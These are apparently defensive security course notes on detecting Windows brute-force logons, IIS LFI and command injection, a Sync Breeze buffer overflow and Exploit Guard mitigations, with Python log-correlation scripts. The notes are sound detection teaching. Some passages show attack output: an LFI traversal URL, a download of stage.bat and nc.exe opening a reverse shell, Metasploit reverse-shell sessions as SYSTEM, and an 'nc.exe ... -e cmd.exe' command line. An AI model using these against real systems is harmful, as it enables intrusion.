The Security Account Manager (SAM) and Windows Authentication
On Windows, the password hashes of local accounts are stored in the Security Account Manager (SAM) database, the SAM hive under C:\Windows\System32\config. To deter offline attacks against a copied SAM, Microsoft introduced the SYSKEY feature, which encrypts the stored hashes with a key derived from the system's boot key. Although it served its purpose for years, SYSKEY was removed in Windows 10 and Windows Server version 1709 because the cryptography it uses, including its key length, is no longer considered secure.
SYSKEY was also being abused in ransomware scams, where a victim's machine was locked with an attacker-chosen SYSKEY password. Microsoft has since recommended BitLocker as the alternative to SYSKEY, which protects not only the SAM but the entire volume.
Windows NT-based operating systems, up to and including Windows Server 2003, store two different password hashes by default: the LAN Manager (LM) hash, which is built on the Data Encryption Standard (DES), and the NT hash (commonly called the NTLM hash), which is an MD4 digest of the UTF-16LE password.
LAN Manager is very weak. The password is converted to upper case, padded or truncated to 14 characters and split into two 7-character halves; each half is used as a DES key to encrypt a fixed constant, so the two halves can be cracked independently. No salt is used, which makes a precomputed hash-lookup (rainbow table) attack feasible.
Starting with Windows Vista and Server 2008, LM hash storage is disabled by default and only the NT hash is kept. Unfortunately, the NT hash is still unsalted, so the same password yields the same hash on every system.
For a local logon, the Local Security Authority (LSA) hashes the supplied password and compares the result with the hash stored in the system's SAM. For NTLM network logons the stored hash itself is the secret used in the challenge-response, which is why a stolen hash is as good as the password.
Suspicious Logins
Potentially Suspicious Logon Event during Off-Hours
[192.168.51.11]: PS C:\Users\Administrator> Get-SecurityEvent 4625 "5/6/2021 00:00:00" "5/7/2021 00:00:00"
ProviderName: Microsoft-Windows-Security-Auditing
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
...
5/6/2021 9:36:44 AM 4625 Information An account failed to log on....
Format-List Custom Field with Logon Type for Logon Failure Events
One of the status codes for a logon failure is C000006F (STATUS_INVALID_LOGON_HOURS): the user attempted to log on outside the authorized hours. Account policy supports restricting the hours during which a user account may log on to a system. It is important to note that this restriction cannot be applied to Administrator accounts, but for ordinary users such a configuration reduces the likelihood of a compromised account authenticating during off-hours, and a C000006F failure is itself worth a look, since legitimate users rarely trigger it.
Custom Output for querying Logon Failure Events using Get-SecurityEvent
[192.168.51.11]: PS C:\Users\Administrator> Get-SecurityEvent 4625 "5/6/2021 00:00:00" "5/7/2021 00:00:00" | Format-List TimeCreated, @{Label = "Logon Type"; Expression = {$_.properties[10].value}}, @{Label = "Status"; Expression = {'{0:X8}' -f $_.properties[7].value}}, @{Label = "Substatus"; Expression = {'{0:X8}' -f $_.properties[9].value}}, @{Label = "Target User Name"; Expression = {$_.properties[5].value}}, @{Label = "Workstation Name"; Expression = {$_.properties[13].value}}, @{Label = "IP Address"; Expression = {$_.properties[19].value}}
TimeCreated : 5/6/2021 9:36:49 AM
Logon Type : 3
Status : C000006D
Substatus : C000006A
Target User Name : Administrator
Workstation Name : attacker01
IP Address : 192.168.51.50
TimeCreated : 5/6/2021 9:36:49 AM
Logon Type : 3
Status : C000006D
Substatus : C000006A
Target User Name : Administrator
Workstation Name : ATTACKER01
IP Address : 192.168.51.50
...
TimeCreated : 5/6/2021 9:36:44 AM
Logon Type : 3
Status : C000006D
Substatus : C000006A
Target User Name : Administrator
Workstation Name : ATTACKER01
IP Address : 192.168.51.50
Network Level Authentication (NLA) is recommended for enterprise networks that expose RDP for remote access. It requires the client to authenticate (through CredSSP) before a session is established, which rules out older clients, reduces the risk of denial-of-service from unauthenticated session setup, and in one case thwarts a means of persistence: an attacker cannot reach the logon screen and trigger a backdoored accessibility binary (the sticky keys trick) without first authenticating. With NLA, a failed RDP authentication is recorded as a logon type 3 (network) 4625 rather than type 10, which matters when filtering. For more information, look up the Accessibility Features sub-technique (T1546.008) of Event Triggered Execution in the MITRE ATT&CK Framework.
Logon Success after brute force authentication
[192.168.51.11]: PS C:\Users\Administrator\Documents> Get-SecurityEvent 4624 "5/6/2021 09:36:44" "5/6/2021 09:37:44" | Where-Object { $_.properties[18].value -eq "192.168.51.50" }
ProviderName: Microsoft-Windows-Security-Auditing
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/6/2021 9:36:50 AM 4624 Information An account was successfully logged on....
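The pattern the two Get-SecurityEvent queries above reveal by hand (a burst of 4625s from one host, then a 4624 from the same host a second later) can be turned into correlation logic. The block below is an added example, not part of the original notes: it runs offline over constructed records whose keys mirror the EventData properties the PowerShell reads by index (Status, SubStatus, LogonType, TargetUserName, WorkstationName, IpAddress). The failure threshold and the time window are assumptions, not values from the page.

```python
"""Added example: brute-force-then-success and off-hours correlation over constructed
4625/4624 records. Threshold, window and the sample events are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS values that appear in the 4625 Status/SubStatus fields (documented Microsoft values)
NTSTATUS = {
    0xC000006D: "STATUS_LOGON_FAILURE (unknown user name or bad password)",
    0xC000006A: "STATUS_WRONG_PASSWORD",
    0xC0000064: "STATUS_NO_SUCH_USER",
    0xC000006F: "STATUS_INVALID_LOGON_HOURS (logon outside authorized hours)",
    0xC0000072: "STATUS_ACCOUNT_DISABLED",
    0xC0000234: "STATUS_ACCOUNT_LOCKED_OUT",
}
LOGON_TYPE = {2: "Interactive", 3: "Network", 5: "Service", 7: "Unlock", 10: "RemoteInteractive"}


def ev(event_id, hhmmss, ip, user, logon_type, status=0, substatus=0, workstation="-"):
    """Build one constructed record; the date is fixed to 2021-05-06 like the queries above."""
    return {
        "id": event_id,
        "time": datetime.strptime("2021-05-06 " + hhmmss, "%Y-%m-%d %H:%M:%S"),
        "ip": ip, "user": user, "logon_type": logon_type,
        "status": status, "substatus": substatus, "workstation": workstation,
    }


# Constructed sample: eight wrong passwords from attacker01 and a success one second later,
# one ordinary logon from another host, and one off-hours failure for a restricted account.
SAMPLE_EVENTS = (
    [ev(4625, f"09:36:{44 + i // 2}", "192.168.51.50", "Administrator", 3,
        0xC000006D, 0xC000006A, "ATTACKER01") for i in range(8)]
    + [ev(4624, "09:36:50", "192.168.51.50", "Administrator", 3, workstation="ATTACKER01"),
       ev(4624, "09:40:12", "192.168.51.20", "bob", 3, workstation="WKS02"),
       ev(4625, "02:13:05", "192.168.51.31", "alice", 3, 0xC000006F, 0x0, "WKS07")]
)


def describe_failure(e):
    """One readable line for a 4625, decoding SubStatus (or Status when SubStatus is 0)."""
    code = e["substatus"] or e["status"]
    reason = NTSTATUS.get(code, f"0x{code:08X}")
    kind = LOGON_TYPE.get(e["logon_type"], str(e["logon_type"]))
    return f'{e["time"]:%H:%M:%S} {kind} logon failure for {e["user"]} from {e["ip"]} ({e["workstation"]}): {reason}'


def off_hours_failures(events):
    """4625s rejected by logon-hours policy: the control worked, but someone still tried."""
    return [e for e in events if e["id"] == 4625 and 0xC000006F in (e["status"], e["substatus"])]


def brute_force_successes(events, threshold=5, window=timedelta(minutes=5)):
    """Alerts where one source IP failed >= threshold times against an account and then
    produced a 4624 for that account within `window` of those failures."""
    failures = defaultdict(list)      # (ip, user) -> failure timestamps
    alerts = []
    for e in sorted(events, key=lambda r: r["time"]):
        key = (e["ip"], e["user"].lower())
        if e["id"] == 4625:
            failures[key].append(e["time"])
        elif e["id"] == 4624:
            recent = [t for t in failures[key] if timedelta(0) <= e["time"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({"ip": e["ip"], "user": e["user"], "failures": len(recent),
                               "first_failure": min(recent), "success": e["time"],
                               "logon_type": LOGON_TYPE.get(e["logon_type"], e["logon_type"])})
    return alerts


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        if e["id"] == 4625:
            print(describe_failure(e))
    for a in brute_force_successes(SAMPLE_EVENTS):
        print(f'ALERT {a["ip"]} -> {a["user"]}: {a["failures"]} failures, then '
              f'{a["logon_type"]} logon succeeded at {a["success"]:%H:%M:%S}')
    for e in off_hours_failures(SAMPLE_EVENTS):
        print("OFF-HOURS:", describe_failure(e))
```

Keying on (source IP, target account) rather than on the account alone keeps a password spray from one host and a user's own typos apart; in production the records would come from Get-WinEvent exported as XML or from a SIEM, with the same field mapping.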
Web Application Attacks
Internet Information Services (IIS)
IIS is Microsoft's built-in web server. Besides HTTP and FTP, it can serve ASP.NET applications and, with the appropriate handler installed, scripting runtimes such as PHP.
Logs are saved under C:\inetpub\logs\LogFiles in one subfolder per site (W3SVC1 for the first site). Each log file name begins with u_ex followed by the date formatted as YYMMDD. Example: u_ex210506.log. Timestamps in these files are UTC by default, so convert them before correlating with Windows event logs, which are displayed in local time.
Example IIS Log Entry
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-05-06 19:42:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-05-06 19:42:21 192.168.51.11 GET / - 80 - 192.168.51.50 Mozilla/5.0+(X11;+Linux+x86_64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 94
Common W3C fields and their descriptions
date, time - timestamp of the request (UTC by default)
s-ip - IP address of the server receiving the web activity
cs-method - HTTP method sent by the client (e.g., GET, POST)
cs-uri-stem - target file requested from the web server
cs-uri-query - query string, if any (where injected parameters usually show up)
s-port - server port of the web service (e.g., 80)
c-ip - IP address of the client requesting the web page
cs(User-Agent) - User-Agent string of the client's browser (spaces are written as +)
cs(Referer) - URL of the previous page that sent the user to the target file, if relevant
sc-status - HTTP status code returned by the server (e.g., 200 for OK, 404 for not found)
time-taken - time in milliseconds the server spent on the request
Local File Inclusion
Local File Inclusion (LFI) occurs when an application passes user-controlled input to a file-loading function without adequate validation, allowing an attacker to read arbitrary files on the underlying file system, typically by supplying directory-traversal sequences such as ../ or, on Windows, ..\.
Local File Inclusion Proof-of-Concept for Site Import Plugin from Exploit-DB
[PoC]
======================================
...
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================
On Windows, web applications like WordPress are typically installed under the IIS web root, so a traversal from the plugin directory lands in C:\inetpub\wwwroot\wordpress\. A common LFI target there is wp-config.php (full path C:\inetpub\wwwroot\wordpress\wp-config.php), which contains the database credentials.
Command Injection allows an attacker to insert arbitrary commands that are executed by the host operating system, with the privileges of the web application's process, rather than being handled by the application that received them.
HTTP POST Excerpt from Plainview Activity Monitor command injection
The only suspicious element in this log entry is the time taken to serve the request: 3731 milliseconds. If a baseline of 200-400 milliseconds is expected for this page, that outlier alone can justify a closer look, because the injected command itself travels in the POST body, which IIS does not log.
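Both of the checks discussed above (traversal sequences in the request, as in the site-import LFI, and a time-taken value far above the page's baseline, the only visible trace of the Plainview command injection) can be run over the u_ex log directly. The block below is an added example, not from the original notes: a parser for the W3C extended format that takes its field names from the #Fields header, with the two checks applied to constructed log lines. The baseline, the multiplier and the sample requests are assumptions.

```python
r"""Added example: W3C extended log parser with traversal and slow-request checks.
The log lines, baseline and multiplier are constructed for this example."""
import re
from urllib.parse import unquote

# Constructed sample modelled on the IIS 10 header shown earlier in these notes.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-05-06 19:42:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-05-06 19:42:21 192.168.51.11 GET / - 80 - 192.168.51.50 Mozilla/5.0+(X11;+Linux+x86_64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 94
2021-05-06 19:43:02 192.168.51.11 GET /wordpress/wp-content/plugins/site-import/admin/page.php url=..\..\..\..\..\..\..\..\windows\win.ini 80 - 192.168.51.50 Mozilla/5.0+(X11;+Linux+x86_64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 131
2021-05-06 19:43:40 192.168.51.11 GET /wordpress/wp-content/plugins/site-import/admin/page.php url=..%2F..%2F..%2Fwordpress%2Fwp-config.php 80 - 192.168.51.50 python-requests/2.25.1 - 200 0 0 120
2021-05-06 19:45:10 192.168.51.11 POST /wordpress/wp-admin/admin.php page=plainview_activity_monitor&tab=activity_tools 80 admin 192.168.51.50 Mozilla/5.0+(X11;+Linux+x86_64;+rv:78.0)+Gecko/20100101+Firefox/78.0 http://192.168.51.11/wordpress/wp-admin/ 200 0 0 3731
2021-05-06 19:46:00 192.168.51.11 GET /wordpress/index.php - 80 - 192.168.51.20 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64) - 200 0 0 240
"""

# ../ and ..\ plus their percent-encoded forms; matched against raw and decoded text
TRAVERSAL = re.compile(r"\.\.(/|\\|%2f|%5c)|%2e%2e", re.IGNORECASE)


def parse_w3c(text):
    """One dict per request line, keyed by the names in the #Fields directive.
    IIS writes '+' for spaces inside a field, so splitting on single spaces is safe."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def is_traversal(row):
    """True if stem or query carries a traversal sequence. A double-decoded copy is
    checked too, so %2e%2e and %252e%252e are caught along with the plain forms."""
    target = f'{row["cs-uri-stem"]}?{row["cs-uri-query"]}'
    return bool(TRAVERSAL.search(target) or TRAVERSAL.search(unquote(unquote(target))))


def find_traversals(rows):
    return [r for r in rows if is_traversal(r)]


def slow_requests(rows, baseline_ms=400, factor=5):
    """Requests whose time-taken exceeds factor x the expected baseline (both assumed).
    Use a per-URI baseline in practice; one number for a whole site is too coarse."""
    return [r for r in rows if int(r["time-taken"]) > baseline_ms * factor]


if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_LOG)
    for r in find_traversals(rows):
        print("TRAVERSAL", r["date"], r["time"], r["c-ip"], r["cs-uri-stem"], r["cs-uri-query"])
    for r in slow_requests(rows):
        print("SLOW", r["date"], r["time"], r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["time-taken"], "ms")
```

Note that the traversal check fires on the encoded request as well, because IIS logs cs-uri-query as received; a single unquote would miss a double-encoded payload, which is why the decoded copy is produced with two passes.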
Sysmon ProcessCreate event log entries
[192.168.51.11]: PS C:\inetpub\logs\LogFiles\W3SVC1> Get-SysmonEvent $null "05/10/2021 16:02:00" "5/10/2021 16:03:00"
ProviderName: Microsoft-Windows-Sysmon
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/10/2021 4:02:34 PM 1 Information Process Create:...
5/10/2021 4:02:34 PM 1 Information Process Create:...
5/10/2021 4:02:34 PM 1 Information Process Create:...
Getting Sysmon ProcessCreate events with chain of execution
Running http_netcat.sh to open a netcat listener and set up Simple HTTP Server
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./http_netcat.sh
listening on [any] 4444 ...
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Running plainview_up_exec to download and execute stage.bat and load.ps1
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ python3 plainview_up_exec.py 192.168.51.11 192.168.51.50
Attempting to upload stage.bat using Plainview Activity Monitor...success!
Now running stage.bat. check your netcat listener for a shell!
Web activity from HTTP Server and command prompt from Windows Server 2019
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./http_netcat.sh
listening on [any] 4444 ...
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.51.11 - - [13/May/2021 14:26:17] "GET /stage.bat HTTP/1.1" 200 -
192.168.51.11 - - [13/May/2021 14:26:17] "GET /stage.bat HTTP/1.1" 200 -
192.168.51.11 - - [13/May/2021 14:26:17] "GET /load.ps1 HTTP/1.1" 200 -
192.168.51.11 - - [13/May/2021 14:26:17] "GET /nc.exe HTTP/1.1" 200 -
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\wordpress\wp-admin>
Confirming that stage.bat was deleted
C:\inetpub\wwwroot\wordpress\wp-admin> cd \
cd \
C:\> dir stage.bat /s
dir stage.bat /s
Volume in drive C has no label.
Volume Serial Number is 0A02-CE1B
File Not Found
All Sysmon events for the attack using plainview_up_exec.py
[192.168.51.11]: PS C:\inetpub\logs\LogFiles\W3SVC1> Get-SysmonEvent $null "05/13/2021 14:26:00" "5/13/2021 14:27:00"
ProviderName: Microsoft-Windows-Sysmon
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/13/2021 2:26:19 PM 3 Information Network connection detected:...
5/13/2021 2:26:19 PM 3 Information Network connection detected:...
5/13/2021 2:26:19 PM 3 Information Network connection detected:...
5/13/2021 2:26:18 PM 1 Information Process Create:...
5/13/2021 2:26:18 PM 1 Information Process Create:...
5/13/2021 2:26:18 PM 11 Information File created:...
5/13/2021 2:26:17 PM 11 Information File created:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 11 Information File created:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
Initial ProcessCreate events from the plainview_up_exec.py script
We could also consider FileCreate events (Sysmon event ID 11) in which TargetFilename is under C:\Windows\Temp. Some malware relies on obscurity to remain undetected, but watching this directory, and joining each file drop to the ProcessGuid that wrote it, may provide the clues needed to trace an infection back to its origin process.
Secondary FileCreate event from the plainview_up_exec.py script
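The chain of execution that Get-SysmonEvent lists above can be rebuilt automatically from the ProcessGuid and ParentProcessGuid fields of ProcessCreate (ID 1) records, and FileCreate (ID 11) drops under C:\Windows\Temp can be joined to the process that wrote them. The block below is an added example, not the course's Sysmon output: the records, GUIDs, image paths and the w3wp.exe -> php-cgi.exe -> cmd.exe -> powershell.exe -> nc.exe chain are all constructed for illustration.

```python
r"""Added example: rebuild Sysmon process ancestry and flag web-server-spawned shells.
All records below are constructed; they are not the course's Sysmon events."""
import ntpath

W3WP = "w3wp.exe"                      # IIS worker process; a shell under it came from the web app
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TEMP_PREFIX = "c:\\windows\\temp\\"     # drop location discussed in the text


def proc(guid, parent_guid, image, cmdline, user="IIS APPPOOL\\DefaultAppPool"):
    """Minimal ProcessCreate (ID 1) record with the fields the analysis needs."""
    return {"EventID": 1, "ProcessGuid": guid, "ParentProcessGuid": parent_guid,
            "Image": image, "CommandLine": cmdline, "User": user}


def filecreate(guid, target):
    """Minimal FileCreate (ID 11) record."""
    return {"EventID": 11, "ProcessGuid": guid, "TargetFilename": target}


SAMPLE_EVENTS = [
    proc("{G-1}", "{G-0}", r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap DefaultAppPool"),
    proc("{G-2}", "{G-1}", r"C:\PHP\php-cgi.exe", "php-cgi.exe"),
    proc("{G-3}", "{G-2}", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Windows\Temp\stage.bat"),
    filecreate("{G-3}", r"C:\Windows\Temp\load.ps1"),
    proc("{G-4}", "{G-3}", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\load.ps1"),
    filecreate("{G-4}", r"C:\Windows\Temp\nc.exe"),
    proc("{G-5}", "{G-4}", r"C:\Windows\Temp\nc.exe", "nc.exe 192.168.51.50 4444 -e cmd.exe"),
    # benign contrast: an administrator's interactive shell, logged out of order on purpose
    proc("{G-7}", "{G-6}", r"C:\Windows\System32\cmd.exe", "cmd.exe", user="SERVER01\\Administrator"),
    proc("{G-6}", "{G-0}", r"C:\Windows\explorer.exe", "explorer.exe", user="SERVER01\\Administrator"),
]


def index_processes(events):
    return {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}


def ancestry(procs, guid):
    """Image basenames from the oldest known ancestor down to `guid`. Stops at a parent
    with no ProcessCreate record (e.g. one that started before Sysmon did)."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        chain.append(ntpath.basename(procs[guid]["Image"]).lower())
        guid = procs[guid]["ParentProcessGuid"]
    return list(reversed(chain))


def web_spawned_shells(events):
    """(shell, chain, command line) for every shell whose ancestry contains w3wp.exe."""
    procs = index_processes(events)
    hits = []
    for guid, p in procs.items():
        name = ntpath.basename(p["Image"]).lower()
        chain = ancestry(procs, guid)
        if name in SHELLS and W3WP in chain[:-1]:
            hits.append((name, " -> ".join(chain), p["CommandLine"]))
    return hits


def temp_drops(events):
    """(file, writing process image) for FileCreate events under the Windows Temp directory."""
    procs = index_processes(events)
    return [(e["TargetFilename"],
             ntpath.basename(procs[e["ProcessGuid"]]["Image"]) if e["ProcessGuid"] in procs else "?")
            for e in events if e["EventID"] == 11 and e["TargetFilename"].lower().startswith(TEMP_PREFIX)]


if __name__ == "__main__":
    for shell, chain, cmd in web_spawned_shells(SAMPLE_EVENTS):
        print(f"WEB-SPAWNED {shell}: {chain}\n    {cmd}")
    for path, writer in temp_drops(SAMPLE_EVENTS):
        print(f"TEMP DROP {path} written by {writer}")
```

Walking ParentProcessGuid rather than ParentProcessId avoids the PID-reuse problem, and the `seen` set guards against a malformed record pointing back at itself. The administrator's cmd.exe under explorer.exe is deliberately not flagged: the signal is the web worker in the ancestry, not the shell by itself.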
Executing Sync Breeze buffer overflow with Metasploit Framework via syncbreeze_exp.sh
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./syncbreeze_exp.sh 192.168.51.11 192.168.51.50
Initiating... please wait
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
RHOST => 192.168.51.11
RPORT => 8080
LHOST => 192.168.51.50
[*] Started reverse TCP handler on 192.168.51.50:4444
[*] Automatically detecting target...
[*] Target is 10.0.28
[*] Sending request...
[*] Command shell session 1 opened (192.168.51.50:4444 ->
192.168.51.11:49688) at 2021-05-21 14:50:40 -0400
Confirming hostname and current user context
C:\Windows\system32>hostname
hostname
server01
C:\Windows\system32>whoami
whoami
nt authority\system
Sync Breeze is not part of IIS and has no auditing mechanism of its own for logon attempts. Sysmon, however, captures the process creation and network connection events this activity generates.
Sysmon events created with buffer overflow
[192.168.51.11]: PS C:\Users\Administrator\Documents> Get-SysmonEvent $null "05/21/2021 14:50:34" "05/21/2021 14:50:44"
ProviderName: Microsoft-Windows-Sysmon
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/21/2021 2:50:42 PM 3 Information Network connection detected:...
5/21/2021 2:50:42 PM 3 Information Network connection detected:...
5/21/2021 2:50:42 PM 3 Information Network connection detected:...
5/21/2021 2:50:40 PM 1 Information Process Create:...
Windows Defender Exploit Guard (WDEG) provides additional auditing and control mechanisms against local malware. It was developed to address the proliferation of file-less malware.
It is the successor to the Microsoft Enhanced Mitigation Experience Toolkit (EMET). There are four major components:
Attack Surface Reduction (ASR): rules that block common malware behaviour, for example Office applications or Adobe Reader creating child processes, or JavaScript and VBScript launching downloaded executable content.
Controlled folder access: Windows prevents untrusted applications from writing to or modifying directories specified by policy. By default the protected set is the user's profile data folders (Documents, Pictures, Desktop and so on) under C:\Users\<user account>\.
Network protection: relies on Microsoft's Intelligent Security Graph as a threat intelligence source for domain and IP reputation. Connections to low-reputation destinations can be blocked regardless of which process or application started them.
Exploit protection: the direct replacement for EMET. It lets administrators apply mitigations such as DEP, ASLR, CFG and ROP checks to applications that do not opt in themselves. It can be configured per process with Set-ProcessMitigation or through the Windows Security app, and deployed at scale by exporting and importing an XML configuration file.
Enabling RopCallerCheck for Sync Breeze using Set-ProcessMitigation
After restarting the service, we can test the exploit again to see whether the protection stops it.
Failed buffer overflow exploitation
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./syncbreeze_exp.sh 192.168.51.11 192.168.51.50
Initiating... please wait
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
RHOST => 192.168.51.11
RPORT => 8080
LHOST => 192.168.51.50
[*] Started reverse TCP handler on 192.168.1.23:4444
[*] Automatically detecting target...
[*] Target is 10.0.28
[*] Sending request...
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
The events for these actions are not written to the Windows Security log, but to the Microsoft-Windows-Security-Mitigations/UserMode (and /KernelMode) logs under Applications and Services Logs. Event ID 22 records a blocked call and event ID 21 an audit-only hit.
Security Mitigation event for Sync Breeze showing exploit being blocked
[192.168.51.11]: PS C:\Users\Administrator>Get-WinEvent -FilterHashTable @{LogName = 'Microsoft-Windows-Security-Mitigations/UserMode'; StartTime = '5/25/2021 13:42:28'; EndTime = '5/25/2021 13:42:30'} | Format-List -Property Id, TimeCreated, LevelDisplayName, Message
Id : 22
TimeCreated : 5/25/2021 1:42:29 PM
LevelDisplayName : Warning
Message : Process 'C:\Program Files (x86)\Sync Breeze Enterprise\bin\syncbrs.exe'
(PID 3388) was blocked from calling the API
'LoadLibraryA' due to return-oriented programming
(ROP) exploit indications.
Clearing the Process Mitigation configuration for Sync Breeze from Windows Registry
[192.168.51.11]: PS C:\Users\Administrator> Remove-Item -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syncbrs.exe'
Confirm
The item at HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syncbrs.exe has children and the Recurse parameter was not specified. If you continue, all children will be removed with the item. Are you sure you want to continue?
[Y] Yes [A] Yes to All [N] No [L] No to All [?] Help (default is "Y"): y
If we did not delete the registry key and attempted to run Set-ProcessMitigation again for the same image, we would likely encounter the PowerShell exception "Destination array was not long enough. Check destIndex and length, and the array's lower bounds."
Enabling RopCallerCheck's Audit-Only mode for Sync Breeze
After restarting the service, we can then test our exploit again to confirm it is only auditing, not stopping.
Successful buffer overflow exploit
kali@attacker01:~$ ./syncbreeze_exp.sh 192.168.51.11 192.168.51.50
Initiating... please wait
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
RHOST => 192.168.51.11
RPORT => 8080
LHOST => 192.168.51.50
[*] Started reverse TCP handler on 192.168.51.50:4444
[*] Automatically detecting target...
[*] Target is 10.0.28
[*] Sending request...
[*] Command shell session 1 opened (192.168.51.50:4444 ->
192.168.51.11:49876) at 2021-05-25 14:23:33 -0400
C:\Windows\system32>whoami
whoami
nt authority\system
Process Mitigation Audit-only events for Sync Breeze Exploitation
[192.168.51.11]: PS C:\Users\Administrator> Get-WinEvent -FilterHashTable @{LogName = 'Microsoft-Windows-Security-Mitigations/UserMode'; StartTime = '5/25/2021 14:23:32'; EndTime = '5/25/2021 14:23:34'} | Format-List -Property Id, TimeCreated, LevelDisplayName, Message
Id : 21
TimeCreated : 5/25/2021 2:23:33 PM
LevelDisplayName : Information
Message : Process 'C:\Program Files (x86)\Sync Breeze Enterprise\bin\syncbrs.exe'
(PID 6124) would have been blocked from calling the API
'CreateProcessA' due to return-oriented programming (ROP)
exploit indications.
Id : 21
TimeCreated : 5/25/2021 2:23:33 PM
LevelDisplayName : Information
Message : Process 'C:\Program Files (x86)\Sync Breeze Enterprise\bin\syncbrs.exe'
(PID 6124) would have been blocked from calling the API
'LoadLibraryA' due to return-oriented programming (ROP)
exploit indications.
Certutil is just one of several native Windows binaries that can be used to download files. We chose this utility because it is installed on Windows by default, and modern attackers have learned to leverage such tools for interesting purposes in a technique known as Living off the Land (LotL). The security community has compiled a list of these useful Windows binaries, scripts and libraries in the LOLBAS project (Living Off The Land Binaries, Scripts and Libraries).